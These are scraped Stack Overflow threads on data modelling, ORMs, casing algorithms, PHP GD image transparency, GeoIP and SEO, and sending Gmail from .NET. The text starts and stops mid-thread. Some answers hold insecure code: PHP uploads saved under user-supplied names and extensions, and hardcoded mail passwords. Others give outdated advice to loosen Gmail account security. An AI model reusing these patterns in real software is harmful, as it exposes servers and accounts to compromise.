A: G'day, I'd start by looking at the metaphor you want to use for your thread framework. Maybe "leader-follower", where a thread is listening for incoming requests, and when a new request comes in it does the work and the next thread in the pool starts listening for incoming requests. Or a thread pool, where the same thread is always listening for incoming requests and then passing the requests over to the next available thread in the thread pool. You might like to visit the Reactor section of the ACE components to get some ideas. HTH. cheers, Rob
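To sketch the ".NET asynchronous socket methods" suggestion, here is a rough, illustrative server skeleton using the Begin/End pattern. The callbacks run on I/O completion threads supplied by the runtime, so an idle connection holds no dedicated thread; the port number and buffer handling are placeholders, not a production design:

using System;
using System.Net;
using System.Net.Sockets;

class AsyncTcpServer
{
    private readonly Socket listener =
        new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);

    public void Start()
    {
        listener.Bind(new IPEndPoint(IPAddress.Any, 9000)); // hypothetical port
        listener.Listen(100);
        listener.BeginAccept(OnAccept, null);
    }

    private void OnAccept(IAsyncResult ar)
    {
        Socket client = listener.EndAccept(ar);
        listener.BeginAccept(OnAccept, null); // immediately wait for the next client

        byte[] buffer = new byte[4096];
        client.BeginReceive(buffer, 0, buffer.Length, SocketFlags.None, result =>
        {
            int bytesRead = client.EndReceive(result);
            // ... process bytesRead bytes from buffer, then issue the next
            // BeginReceive; no thread blocks while the connection is idle.
        }, null);
    }
}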
{ "language": "en", "url": "https://stackoverflow.com/questions/32198", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: Data model for an extensible web form Suppose that I have a form that contains 10 fields: field1..field10. I store the form data in one or more database tables, probably using 10 database columns. Now suppose a few months later that I want to add 3 more fields. And in the future I may add/delete fields from this form based on changing requirements. If I have a database column per form field, then I would have to make the corresponding changes to the database each time I change the form. This seems like a maintenance headache. There must be a more sophisticated way. So my question is, how do I design a data model that is loosely coupled with my UI? A concrete use case is a CRM system that is extensible/customizable by users.

A: You could abstract fields to a separate table so that they are many-to-many to the Form table:

Form
  ID
  Name
  etc.

Field
  ID
  Label
  Value

FormField
  FormID
  FieldID

A: Unless you have a really good reason to do this, then this generally is a bad idea. It makes it very difficult to optimize and scale the database. If you absolutely must do it, then Travis's suggestion is fine for small tables, but it's not really going to scale that well.

A: My team came up with a solution for this when I worked for Quest Computing on AIMS (www.totalaims.com). In summary, we added maintenance screens that allowed the administrator to add metadata and, as a result, add fields to the database in certain tables. The fields were also added to their own maintenance and search screens automatically. We built this on top of OpenACS. You can find out more at www.openacs.org - search for "flexbase" or "dynfields" or look here: www.project-open.org/doc/intranet-dynfield/ . This worked quite well - the main downside being a side effect of the main upside, i.e. that the addition of fields could be done by non-DBAs, and as a result performance could easily be compromised.

A: I have done this in the past using an XML column in the database to store the extra fields. I generally just have a big property bag in the XML column and then use XSD to enforce validation when doing updates or inserts. When I am retrieving the data I have rules in XSL or the object model that determine if the element is displayed, what additional formatting to apply, and, for web forms, what type of input element to use based on the type of data in the property node. It works really well if there is a need to have some data stored relationally and other data stored extensibly, to avoid the wide table with lots of null rows effect. If you don't need to do relational things with the data, such as joining or pivoting with other tables in the database, then a simple self-contained XML form is a good solution as well. Most databases now have first-class XML support for this sort of thing. In SQL Server, for example, you can apply an XSD schema to a column of an XML datatype right in the database. In recent versions there is also support for indexing on those columns.
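As an illustration of the attribute-table design from the first answer, here is a hedged C# sketch that pivots a form's rows back into a property bag; the table and column names follow that answer, and the connection string handling is a placeholder:

using System.Collections.Generic;
using System.Data.SqlClient;

static class FormRepository
{
    public static Dictionary<string, string> LoadFormValues(string connectionString, int formId)
    {
        var values = new Dictionary<string, string>();

        using (var connection = new SqlConnection(connectionString))
        using (var command = new SqlCommand(
            @"SELECT f.Label, f.Value
                FROM Field f
                JOIN FormField ff ON ff.FieldID = f.ID
               WHERE ff.FormID = @formId", connection))
        {
            command.Parameters.AddWithValue("@formId", formId);
            connection.Open();

            using (var reader = command.ExecuteReader())
            {
                // Each row becomes one logical "column" of the form.
                while (reader.Read())
                    values[reader.GetString(0)] = reader.GetString(1);
            }
        }

        return values;
    }
}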
{ "language": "en", "url": "https://stackoverflow.com/questions/32227", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Adaptive Database Are there any rapid database prototyping tools that don't require me to declare a database schema, but rather create it based on the way I'm using my entities? For example, assuming an empty database (pseudo code):

user1 = new User() // Creates the user table with a single id column
user1.firstName = "Allain" // alters the table to have a firstName column as varchar(255)

user2 = new User() // Reuses the table
user2.firstName = "Bob"
user2.lastName = "Loblaw" // Alters the table to have a last name column

Since there are logical assumptions that can be made when dynamically creating the schema, you could always override its choices by using your DB tools to tweak it later. Also, you could generate your schema by unit testing it this way. And obviously this is only for prototyping. Is there anything like this out there?

A: Google App Engine works like this. When you download the toolkit you get a local copy of the database engine for testing.

A: Grails uses Hibernate to persist domain objects and produces behavior similar to what you describe. To alter the schema you simply modify the domain; in this simple case the file is named User.groovy.

class User {
    String userName
    String firstName
    String lastName
    Date dateCreated
    Date lastUpdated

    static constraints = {
        userName(blank: false, unique: true)
        firstName(blank: false)
        lastName(blank: false)
    }

    String toString() {"$lastName, $firstName"}
}

Saving the file alters the schema automatically. Likewise, if you are using scaffolding, it is updated. The prototyping process becomes: run the application, view the page in your browser, modify the domain, refresh the browser, and see the changes.

A: I agree with the NHibernate approach and auto-database-generation. But, if you want to avoid writing a configuration file and stay close to the code, use Castle's ActiveRecord. You declare the 'schema' directly on the class via attributes.

[ActiveRecord]
public class User : ActiveRecordBase<User>
{
    [PrimaryKey]
    public Int32 UserId { get; set; }

    [Property]
    public String FirstName { get; set; }
}

There are a variety of constraints you can apply (validation, bounds, etc.) and you can declare relationships between different data model classes. Most of these options are parameters added to the attributes. It's rather simple. So, you're working with code, declaring usage in code. And when you're done, let ActiveRecord create the database:

ActiveRecordStarter.Initialize();
ActiveRecordStarter.CreateSchema();

A: Maybe not exactly responding to your general question, but if you used (N)Hibernate then you can automatically generate the database schema from your hbm mapping files. It's not done directly from your code as you seem to want, but Hibernate schema generation works well for us.

A: Do you want the schema, but have it generated, or do you actually want NO schema? For the former I'd go with NHibernate, as @tom-carter said. Have it generate your schema for you, and you are all good (at least until you roll your app out; then look at something like Tarantino and RedGate SQL Diff or whatever it's called to generate update scripts). If you want the latter, Google App Engine does this, as I've discovered this afternoon, and it's very nice. If you want to stick with code under your control, I'd suggest looking at CouchDB, though it's a bit of upfront work getting it set up. But once you have it, it's a totally, 100% schema-free database. Well, you have an ID and a Version, but that's it - the rest is up to you.
http://incubator.apache.org/couchdb/ But by the sounds of it, (N)Hibernate would suit you best, though I could be wrong.

A: You could use an object database.
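To make the (N)Hibernate suggestion concrete, here is a minimal sketch of generating the schema from existing mappings. It assumes a configured hibernate.cfg.xml and a hypothetical mappings assembly, and the exact SchemaExport overloads vary slightly between NHibernate versions:

using NHibernate.Cfg;
using NHibernate.Tool.hbm2ddl;

class SchemaBootstrap
{
    static void Main()
    {
        var configuration = new Configuration();
        configuration.Configure();          // reads hibernate.cfg.xml
        configuration.AddAssembly("MyApp"); // hypothetical assembly holding the hbm mappings

        // Print the generated DDL and execute it against the configured database.
        new SchemaExport(configuration).Create(true, true);
    }
}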
{ "language": "en", "url": "https://stackoverflow.com/questions/32231", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "3" }
Q: Algorithm to format text to Pascal or camel casing Using this question as the base, is there an algorithm or coding example to change some text to Pascal or camel casing? For example:

mynameisfred

becomes

Camel: myNameIsFred
Pascal: MyNameIsFred

A: I found a thread with a bunch of Perl guys arguing the toss on this question over at http://www.perlmonks.org/?node_id=336331. I hope this isn't too much of a non-answer to the question, but I would say you have a bit of a problem in that it would be a very open-ended algorithm, which could have a lot of 'misses' as well as hits. For example, say you inputted:-

camelCase("hithisisatest");

The output could be:-

"hiThisIsATest"

Or:-

"hitHisIsATest"

There's no way the algorithm would know which to prefer. You could add some extra code to specify that you'd prefer more common words, but again misses would occur (Peter Norvig wrote a very small spelling corrector over at http://norvig.com/spell-correct.html which might help algorithm-wise; I wrote a C# implementation if C# is your language). I'd agree with Mark and say you'd be better off having an algorithm that takes a delimited input, i.e. this_is_a_test, and converts that. That'd be simple to implement, i.e. in pseudocode:-

SetPhraseCase(phrase, CamelOrPascal):
  if no delimiters
    if camelCase
      return lowerFirstLetter(phrase)
    else
      return capitaliseFirstLetter(phrase)
  words = splitOnDelimiter(phrase)
  if camelCase
    ret = lowerFirstLetter(first word)
  else
    ret = capitaliseFirstLetter(first word)
  for i in 2 to len(words):
    ret += capitaliseFirstLetter(words[i])
  return ret

capitaliseFirstLetter(word):
  if len(word) <= 1 return upper(word)
  return upper(word[0]) + word[1..len(word)]

lowerFirstLetter(word):
  if len(word) <= 1 return lower(word)
  return lower(word[0]) + word[1..len(word)]

You could also replace my capitaliseFirstLetter() function with a proper case algorithm if you so wished. A C# implementation of the above described algorithm is as follows (complete console program with test harness):-

using System;

class Program
{
    static void Main(string[] args)
    {
        var caseAlgorithm = new CaseAlgorithm('_');

        while (true)
        {
            string input = Console.ReadLine();

            if (string.IsNullOrEmpty(input)) return;

            Console.WriteLine("Input '{0}' in camel case: '{1}', pascal case: '{2}'",
                input,
                caseAlgorithm.SetPhraseCase(input, CaseAlgorithm.CaseMode.CamelCase),
                caseAlgorithm.SetPhraseCase(input, CaseAlgorithm.CaseMode.PascalCase));
        }
    }
}

public class CaseAlgorithm
{
    public enum CaseMode { PascalCase, CamelCase }

    private char delimiterChar;

    public CaseAlgorithm(char inDelimiterChar)
    {
        delimiterChar = inDelimiterChar;
    }

    public string SetPhraseCase(string phrase, CaseMode caseMode)
    {
        // You might want to do some sanity checks here like making sure
        // there's no invalid characters, etc.
        if (string.IsNullOrEmpty(phrase)) return phrase;

        // .Split() will simply return a string[] of size 1 if no delimiter present so
        // no need to explicitly check this.
        var words = phrase.Split(delimiterChar);

        // Set first word accordingly.
        string ret = setWordCase(words[0], caseMode);

        // If there are other words, set them all to pascal case.
        if (words.Length > 1)
        {
            for (int i = 1; i < words.Length; ++i)
                ret += setWordCase(words[i], CaseMode.PascalCase);
        }

        return ret;
    }

    private string setWordCase(string word, CaseMode caseMode)
    {
        switch (caseMode)
        {
            case CaseMode.CamelCase:
                return lowerFirstLetter(word);
            case CaseMode.PascalCase:
                return capitaliseFirstLetter(word);
            default:
                throw new NotImplementedException(
                    string.Format("Case mode '{0}' is not recognised.", caseMode.ToString()));
        }
    }

    private string lowerFirstLetter(string word)
    {
        return char.ToLower(word[0]) + word.Substring(1);
    }

    private string capitaliseFirstLetter(string word)
    {
        return char.ToUpper(word[0]) + word.Substring(1);
    }
}

A: The only way to do that would be to run each section of the word through a dictionary. "mynameisfred" is just an array of characters; splitting it up into "My Name Is Fred" means understanding what the joining of each of those characters means. You could do it easily if your input was separated in some way, e.g. "my name is fred" or "my_name_is_fred".
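For completeness, a rough sketch of that dictionary idea in C#: greedily match the longest known word at each position, then capitalise each piece. The four-word dictionary is a stand-in, and real segmentation needs a full word list plus backtracking (as the perlmonks thread discusses), so treat this as an illustration only:

using System.Collections.Generic;

static class WordSplitter
{
    static readonly string[] Dictionary = { "my", "name", "is", "fred" };

    public static string ToPascalCase(string input)
    {
        var pieces = new List<string>();
        int position = 0;

        while (position < input.Length)
        {
            // Find the longest dictionary word starting at this position.
            string match = null;
            foreach (string word in Dictionary)
            {
                if (input.Length - position >= word.Length
                    && input.Substring(position, word.Length) == word
                    && (match == null || word.Length > match.Length))
                {
                    match = word;
                }
            }

            if (match == null) { position++; continue; } // skip unknown characters

            pieces.Add(char.ToUpper(match[0]) + match.Substring(1));
            position += match.Length;
        }

        return string.Join("", pieces.ToArray());
    }
}

// WordSplitter.ToPascalCase("mynameisfred") returns "MyNameIsFred";
// lowercasing the first piece instead would give the camel-case variant.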
{ "language": "en", "url": "https://stackoverflow.com/questions/32241", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "8" }
Q: Can PNG image transparency be preserved when using PHP's GDlib imagecopyresampled? The following PHP code snippet uses GD to resize a browser-uploaded PNG to 128x128. It works great, except that the transparent areas in the original image are being replaced with a solid color- black in my case. Even though imagesavealpha is set, something isn't quite right. What's the best way to preserve the transparency in the resampled image? $uploadTempFile = $myField[ 'tmp_name' ] list( $uploadWidth, $uploadHeight, $uploadType ) = getimagesize( $uploadTempFile ); $srcImage = imagecreatefrompng( $uploadTempFile ); imagesavealpha( $targetImage, true ); $targetImage = imagecreatetruecolor( 128, 128 ); imagecopyresampled( $targetImage, $srcImage, 0, 0, 0, 0, 128, 128, $uploadWidth, $uploadHeight ); imagepng( $targetImage, 'out.png', 9 ); A: An addition that might help some people: It is possible to toggle imagealphablending while building the image. I the specific case that I needed this, I wanted to combine some semi-transparent PNG's on a transparent background. First you set imagealphablending to false and fill the newly created true color image with a transparent color. If imagealphablending were true, nothing would happen because the transparent fill would merge with the black default background and result in black. Then you toggle imagealphablending to true and add some PNG images to the canvas, leaving some of the background visible (ie. not filling up the entire image). The result is an image with a transparent background and several combined PNG images. A: I have made a function for resizing image like JPEG/GIF/PNG with copyimageresample and PNG images still keep there transparency: $myfile=$_FILES["youimage"]; function ismyimage($myfile) { if((($myfile["type"] == "image/gif") || ($myfile["type"] == "image/jpg") || ($myfile["type"] == "image/jpeg") || ($myfile["type"] == "image/png")) && ($myfile["size"] <= 2097152 /*2mb*/) ) return true; else return false; } function upload_file($myfile) { if(ismyimage($myfile)) { $information=getimagesize($myfile["tmp_name"]); $mywidth=$information[0]; $myheight=$information[1]; $newwidth=$mywidth; $newheight=$myheight; while(($newwidth > 600) || ($newheight > 400 )) { $newwidth = $newwidth-ceil($newwidth/100); $newheight = $newheight-ceil($newheight/100); } $files=$myfile["name"]; if($myfile["type"] == "image/gif") { $tmp=imagecreatetruecolor($newwidth,$newheight); $src=imagecreatefromgif($myfile["tmp_name"]); imagecopyresampled($tmp, $src, 0, 0, 0, 0, $newwidth, $newheight, $mywidth, $myheight); $con=imagegif($tmp, $files); imagedestroy($tmp); imagedestroy($src); if($con){ return true; } else { return false; } } else if(($myfile["type"] == "image/jpg") || ($myfile["type"] == "image/jpeg") ) { $tmp=imagecreatetruecolor($newwidth,$newheight); $src=imagecreatefromjpeg($myfile["tmp_name"]); imagecopyresampled($tmp, $src, 0, 0, 0, 0, $newwidth, $newheight, $mywidth, $myheight); $con=imagejpeg($tmp, $files); imagedestroy($tmp); imagedestroy($src); if($con) { return true; } else { return false; } } else if($myfile["type"] == "image/png") { $tmp=imagecreatetruecolor($newwidth,$newheight); $src=imagecreatefrompng($myfile["tmp_name"]); imagealphablending($tmp, false); imagesavealpha($tmp,true); $transparent = imagecolorallocatealpha($tmp, 255, 255, 255, 127); imagefilledrectangle($tmp, 0, 0, $newwidth, $newheight, $transparent); imagecopyresampled($tmp, $src, 0, 0, 0, 0, $newwidth, $newheight, $mywidth, $myheight); $con=imagepng($tmp, $files); imagedestroy($tmp); 
imagedestroy($src);

            if($con) {
                return true;
            } else {
                return false;
            }
        }
    }
    else
        return false;
}

A: I suppose that this might do the trick:

$uploadTempFile = $myField[ 'tmp_name' ];
list( $uploadWidth, $uploadHeight, $uploadType ) = getimagesize( $uploadTempFile );

$srcImage = imagecreatefrompng( $uploadTempFile );

$targetImage = imagecreatetruecolor( 128, 128 );
$transparent = imagecolorallocate($targetImage, 0, 255, 0);
imagecolortransparent($targetImage, $transparent);
imagefilledrectangle($targetImage, 0, 0, 127, 127, $transparent);

imagecopyresampled( $targetImage, $srcImage, 0, 0, 0, 0, 128, 128, $uploadWidth, $uploadHeight );

imagepng( $targetImage, 'out.png', 9 );

The downside is that the image will be stripped of every 100%-green pixel. Anyhow, hope it helps :)

A: Why do you make things so complicated? The following is what I use, and so far it has done the job for me.

$im = ImageCreateFromPNG($source);
$new_im = imagecreatetruecolor($new_size[0], $new_size[1]);
imagecolortransparent($new_im, imagecolorallocate($new_im, 0, 0, 0));
imagecopyresampled($new_im, $im, 0, 0, 0, 0, $new_size[0], $new_size[1], $size[0], $size[1]);

A: imagealphablending( $targetImage, false ); imagesavealpha( $targetImage, true ); did it for me. Thanks ceejayoz. Note: the target image needs the alpha settings, not the source image. Edit: full replacement code. See also answers below and their comments. This is not guaranteed to be perfect in any way, but did achieve my needs at the time.

$uploadTempFile = $myField[ 'tmp_name' ];
list( $uploadWidth, $uploadHeight, $uploadType ) = getimagesize( $uploadTempFile );

$srcImage = imagecreatefrompng( $uploadTempFile );

$targetImage = imagecreatetruecolor( 128, 128 );
imagealphablending( $targetImage, false );
imagesavealpha( $targetImage, true );

imagecopyresampled( $targetImage, $srcImage, 0, 0, 0, 0, 128, 128, $uploadWidth, $uploadHeight );

imagepng( $targetImage, 'out.png', 9 );

A: Regarding preserving transparency: yes, as stated in other posts, imagesavealpha() has to be set to true to use the alpha flag, and imagealphablending() must be set to false, else it doesn't work. Also I spotted two minor things in your code:

* *You don't need to call getimagesize() to get the width/height for imagecopyresampled() *The $uploadWidth and $uploadHeight should be the value minus 1, since the coordinates start at 0 and not 1; otherwise it would copy them into an empty pixel. Replacing them with imagesx($targetImage) - 1 and imagesy($targetImage) - 1, respectively, should do :)

A: I believe this should do the trick:

$srcImage = imagecreatefrompng($uploadTempFile);
imagealphablending($srcImage, false);
imagesavealpha($srcImage, true);

edit: Someone in the PHP docs claims imagealphablending should be true, not false. YMMV.

A: Here is my total test code. It works for me.

$imageFileType = pathinfo($_FILES["image"]["name"], PATHINFO_EXTENSION);
$filename = 'test.' .
$imageFileType; move_uploaded_file($_FILES["image"]["tmp_name"], $filename); $source_image = imagecreatefromjpeg($filename); $source_imagex = imagesx($source_image); $source_imagey = imagesy($source_image); $dest_imagex = 400; $dest_imagey = 600; $dest_image = imagecreatetruecolor($dest_imagex, $dest_imagey); imagecopyresampled($dest_image, $source_image, 0, 0, 0, 0, $dest_imagex, $dest_imagey, $source_imagex, $source_imagey); imagesavealpha($dest_image, true); $trans_colour = imagecolorallocatealpha($dest_image, 0, 0, 0, 127); imagefill($dest_image, 0, 0, $trans_colour); imagepng($dest_image,"test1.png",1); A: Pay attention to the source image's width and height values which are passed to imagecopyresampled function. If they are bigger than actual source image size, the rest of image area will be filled with black color. A: I combined the answers from ceejayoz and Cheekysoft, which gave the best result for me. Without imagealphablending() and imagesavealpha() the image is not clear: $img3 = imagecreatetruecolor(128, 128); imagecolortransparent($img3, imagecolorallocate($img3, 0, 0, 0)); imagealphablending( $img3, false ); imagesavealpha( $img3, true ); imagecopyresampled($img3, $srcImage, 0, 0, 0, 0, 128, 128, $uploadWidth, $uploadHeight); imagepng($img3, 'filename.png', 9); A: For anyone having problems with imagecopyresampled or imagerotate with black bars on background, I have found a code example here: https://qna.habr.com/q/646622#answer_1417035 // get image sizes (X,Y) $wx = imagesx($imageW); $wy = imagesy($imageW); // create a new image from the sizes on transparent canvas $new = imagecreatetruecolor($wx, $wy); $transparent = imagecolorallocatealpha($new, 0, 0, 0, 127); $rotate = imagerotate($imageW, 280, $transparent); imagealphablending($rotate, true); imagesavealpha($rotate, true); // get the newest image X and Y $ix = imagesx($rotate); $iy = imagesy($rotate); //copy the image to the canvas imagecopyresampled($destImg, $rotate, 940, 2050, 0, 0, $ix, $iy, $ix, $iy);
{ "language": "en", "url": "https://stackoverflow.com/questions/32243", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "113" }
Q: How to get the Googlebot to get the correct GEOIPed content? OK. This problem is doing my head in. And I don't know if there even IS a definitive answer. We have a website, let's call it mycompany.com. It's a UK-based site, with UK-based content. Google knows about it, and we have done a load of SEO on it. All is well. Except, we are about to relaunch my company, the GLOBAL brand, so we now need mycompany.com/uk, mycompany.com/us, and mycompany.com/au, for the various countries' local content. We are using GEOIP, so if someone from the US loads mycompany.com, they get redirected to mycompany.com/us etc. If someone isn't in one of those three countries (US, Australia, or UK) they get the UK site. This is all well and good, but we don't want to lose the rather large amount of Google juice we have on mycompany.com! And worse, the Googlebot appears to be 100% based in the US, so the US site (which is pretty much our LEAST important one of the three) will appear to be the main one. We have thought about detecting the bot, and serving UK content, but it appears Google may smack us for that. Has anyone else come across this situation, and have a solution?

A: As long as Google can find mycompany.com/uk and mycompany.com/au, it'll index all three versions of the site. Your domain's Google juice should apply to all three URLs just fine if they're on the same domain.

A: Have you thought about including links for the different sites on the homepage? Google could follow those and index their content as well - in turn indexing the UK content.

A: If you instead use uk.mycompany.com, us.mycompany.com, etc., then you can register them with Google Webmaster Tools and specifically tell Google which country they are from. This might still work with folders rather than subdomains, but I haven't tried it. One way to get round that, thinking about it, would be to 301 redirect uk.mycompany.com to mycompany.com/uk; then you'd be telling Google, as well as keeping your existing structure.

A: @ross: yes, we have links between the sites. It's just the home page, and which one comes up when someone searches for "my company" in Google. Thanks!

A: Google Alerts just brought me to this thread. The domain name that was previously used in your question is my blog and the domain name is not for sale. Are you just using this as an example domain - for the purpose of this discussion only? The convention is to use example.com as it is reserved for this exact purpose. Some clarification would be appreciated.
{ "language": "en", "url": "https://stackoverflow.com/questions/32246", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "0" }
Q: Sending email in .NET through Gmail Instead of relying on my host to send an email, I was thinking of sending the email messages using my Gmail account. The emails are personalized emails to the bands I play on my show. Is it possible to do it? A: If you want to send the email in the background, you can do the below public void SendEmail(string address, string subject, string message) { Thread threadSendMails; threadSendMails = new Thread(delegate() { //Place your Code here }); threadSendMails.IsBackground = true; threadSendMails.Start(); } and add namespace using System.Threading; A: Try This, private void button1_Click(object sender, EventArgs e) { try { MailMessage mail = new MailMessage(); SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com"); mail.From = new MailAddress("[email protected]"); mail.To.Add("to_address"); mail.Subject = "Test Mail"; mail.Body = "This is for testing SMTP mail from GMAIL"; SmtpServer.Port = 587; SmtpServer.Credentials = new System.Net.NetworkCredential("username", "password"); SmtpServer.EnableSsl = true; SmtpServer.Send(mail); MessageBox.Show("mail Send"); } catch (Exception ex) { MessageBox.Show(ex.ToString()); } } A: use this way MailMessage sendmsg = new MailMessage(SendersAddress, ReceiversAddress, subject, body); SmtpClient client = new SmtpClient("smtp.gmail.com"); client.Port = Convert.ToInt32("587"); client.EnableSsl = true; client.Credentials = new System.Net.NetworkCredential("[email protected]","MyPassWord"); client.Send(sendmsg); Don't forget this : using System.Net; using System.Net.Mail; A: From 1 Jun 2022, Google has added some security features. Google no longer supports the use of third-party apps or devices which ask you to sign in to your Google Account using only your username and password, or which send mail directly using the username and password of the google account. But you can still send E-Mail via your gmail account by generating an app password. Below are the steps to generate a new password. * *Go to https://myaccount.google.com/security *Turn on two step verification. *Confirm your account by phone if needed. *Click "App Passwords", just below the "2 step verification" tick. Request a new password for the mail app. Now we have to use this password for sending mail instead of the original password of your account. Below is the example code for sending mail public static void SendMailFromApp(string SMTPServer, int SMTP_Port, string From, string Password, string To, string Subject, string Body) { var smtpClient = new SmtpClient(SMTPServer, SMTP_Port) { DeliveryMethod = SmtpDeliveryMethod.Network, UseDefaultCredentials = false, EnableSsl = true }; smtpClient.Credentials = new NetworkCredential(From, Password); //Use the new password, generated from google! var message = new System.Net.Mail.MailMessage(new System.Net.Mail.MailAddress(From, "SendMail2Step"), new System.Net.Mail.MailAddress(To, To)); message.Subject = Subject; message.Body = Body; /* set the subject and body from the parameters */ smtpClient.Send(message); } You can call the method like below SendMailFromApp("smtp.gmail.com", 25, "[email protected]", "tyugyyj1556jhghg",//This will be generated by google, copy it here. "[email protected]", "New Mail Subject", "Body of mail from My App"); A: Changing sender on Gmail / Outlook.com email: To prevent spoofing - Gmail/Outlook.com won't let you send from an arbitrary user account name.
If you have a limited number of senders you can follow these instructions and then set the From field to this address: Sending mail from a different address If you want to send from an arbitrary email address (such as a feedback form on a website where the user enters their email and you don't want them emailing you directly) about the best you can do is this: msg.ReplyToList.Add(new System.Net.Mail.MailAddress(email, friendlyName)); This would let you just hit 'reply' in your email account to reply to the fan of your band on a feedback page, but they wouldn't get your actual email address, which would likely lead to a tonne of spam. If you're in a controlled environment this works great, but please note that I've seen some email clients send to the from address even when reply-to is specified (I don't know which). A: I had the same issue, but it was resolved by going to gmail's security settings and Allowing Less Secure apps. The Code from Domenic & Donny works, but only if you enable that setting. If you are signed in (to Google) you can follow this link and toggle "Turn on" for "Access for less secure apps" A: using System; using System.Net; using System.Net.Mail; namespace SendMailViaGmail { class Program { static void Main(string[] args) { //Specify the sender's gmail address string SendersAddress = "[email protected]"; //Specify the address you want to send Email to (can be any valid email address) string ReceiversAddress = "[email protected]"; //Specify the password of the gmail account you are using to send mail (pw of [email protected]) const string SendersPassword = "Password"; //Write the subject of your mail const string subject = "Testing"; //Write the contents of your mail const string body = "Hi This Is my Mail From Gmail"; try { //We will use the SmtpClient class, which allows us to send email using the SMTP protocol //I have specified the properties of SmtpClient smtp within {} //gmail's smtp server name is smtp.gmail.com and the port number is 587 SmtpClient smtp = new SmtpClient { Host = "smtp.gmail.com", Port = 587, EnableSsl = true, DeliveryMethod = SmtpDeliveryMethod.Network, Credentials = new NetworkCredential(SendersAddress, SendersPassword), Timeout = 3000 }; //MailMessage represents a mail message //it takes 4 parameters (From, To, subject, body) MailMessage message = new MailMessage(SendersAddress, ReceiversAddress, subject, body); /*We use the smtp server we specified above to send the message (MailMessage message)*/ smtp.Send(message); Console.WriteLine("Message Sent Successfully"); Console.ReadKey(); } catch (Exception ex) { Console.WriteLine(ex.Message); Console.ReadKey(); } } } } A: This is how to send email with an attachment. Simple and short.
source: http://coding-issues.blogspot.in/2012/11/sending-email-with-attachments-from-c.html using System.Net; using System.Net.Mail; public void email_send() { MailMessage mail = new MailMessage(); SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com"); mail.From = new MailAddress("your [email protected]"); mail.To.Add("[email protected]"); mail.Subject = "Test Mail - 1"; mail.Body = "mail with attachment"; System.Net.Mail.Attachment attachment; attachment = new System.Net.Mail.Attachment("c:/textfile.txt"); mail.Attachments.Add(attachment); SmtpServer.Port = 587; SmtpServer.Credentials = new System.Net.NetworkCredential("your [email protected]", "your password"); SmtpServer.EnableSsl = true; SmtpServer.Send(mail); } A: Google has removed the less secure apps setting from our Google accounts; this means that we can no longer send emails from the SMTP server using our actual google passwords. We need to either use Xoauth2 and authorize the user, or create an app password on an account that has 2fa enabled. Once created, an app password can be used in place of your standard gmail password. class Program { private const string To = "[email protected]"; private const string From = "[email protected]"; private const string GoogleAppPassword = "XXXXXXXX"; private const string Subject = "Test email"; private const string Body = "<h1>Hello</h1>"; static void Main(string[] args) { Console.WriteLine("Hello World!"); var smtpClient = new SmtpClient("smtp.gmail.com") { Port = 587, Credentials = new NetworkCredential(From , GoogleAppPassword), EnableSsl = true, }; var mailMessage = new MailMessage { From = new MailAddress(From), Subject = Subject, Body = Body, IsBodyHtml = true, }; mailMessage.To.Add(To); smtpClient.Send(mailMessage); } } Quick fix for SMTP username and password not accepted error A: After the google update, this is the valid method to send an email using c# or .net. using System; using System.Net; using System.Net.Mail; namespace EmailApp { internal class Program { public static void Main(string[] args) { String SendMailFrom = "Sender Email"; String SendMailTo = "Receiver Email"; String SendMailSubject = "Email Subject"; String SendMailBody = "Email Body"; try { SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com",587); SmtpServer.DeliveryMethod = SmtpDeliveryMethod.Network; MailMessage email = new MailMessage(); // START email.From = new MailAddress(SendMailFrom); email.To.Add(SendMailTo); email.CC.Add(SendMailFrom); email.Subject = SendMailSubject; email.Body = SendMailBody; //END SmtpServer.Timeout = 5000; SmtpServer.EnableSsl = true; SmtpServer.UseDefaultCredentials = false; SmtpServer.Credentials = new NetworkCredential(SendMailFrom, "Google App Password"); SmtpServer.Send(email); Console.WriteLine("Email Successfully Sent"); Console.ReadKey(); } catch (Exception ex) { Console.WriteLine(ex.ToString()); Console.ReadKey(); } } } } For creating the app password, you can follow this article: https://www.techaeblogs.live/2022/06/how-to-send-email-using-gmail.html A: Google may block sign in attempts from some apps or devices that do not use modern security standards. Since these apps and devices are easier to break into, blocking them helps keep your account safer.
Some examples of apps that do not support the latest security standards include: * *The Mail app on your iPhone or iPad with iOS 6 or below *The Mail app on your Windows phone preceding the 8.1 release *Some Desktop mail clients like Microsoft Outlook and Mozilla Thunderbird Therefore, you have to enable Less Secure Sign-In in your google account. After signing in to your google account, go to: https://myaccount.google.com/lesssecureapps or https://www.google.com/settings/security/lesssecureapps In C#, you can use the following code: using (MailMessage mail = new MailMessage()) { mail.From = new MailAddress("[email protected]"); mail.To.Add("[email protected]"); mail.Subject = "Hello World"; mail.Body = "<h1>Hello</h1>"; mail.IsBodyHtml = true; mail.Attachments.Add(new Attachment("C:\\file.zip")); using (SmtpClient smtp = new SmtpClient("smtp.gmail.com", 587)) { smtp.Credentials = new NetworkCredential("[email protected]", "password"); smtp.EnableSsl = true; smtp.Send(mail); } } A: For me to get it to work, I had to enable my gmail account, making it possible for other apps to gain access. This is done with the "enable less secure apps" and also using this link: https://accounts.google.com/b/0/DisplayUnlockCaptcha A: Here is one method to send mail and get the credentials from web.config: public static string SendEmail(string To, string Subject, string Msg, bool bodyHtml = false, bool test = false, Stream AttachmentStream = null, string AttachmentType = null, string AttachmentFileName = null) { try { System.Net.Mail.MailMessage newMsg = new System.Net.Mail.MailMessage(System.Configuration.ConfigurationManager.AppSettings["mailCfg"], To, Subject, Msg); newMsg.BodyEncoding = System.Text.Encoding.UTF8; newMsg.HeadersEncoding = System.Text.Encoding.UTF8; newMsg.SubjectEncoding = System.Text.Encoding.UTF8; System.Net.Mail.SmtpClient smtpClient = new System.Net.Mail.SmtpClient(); if (AttachmentStream != null && AttachmentType != null && AttachmentFileName != null) { System.Net.Mail.Attachment attachment = new System.Net.Mail.Attachment(AttachmentStream, AttachmentFileName); System.Net.Mime.ContentDisposition disposition = 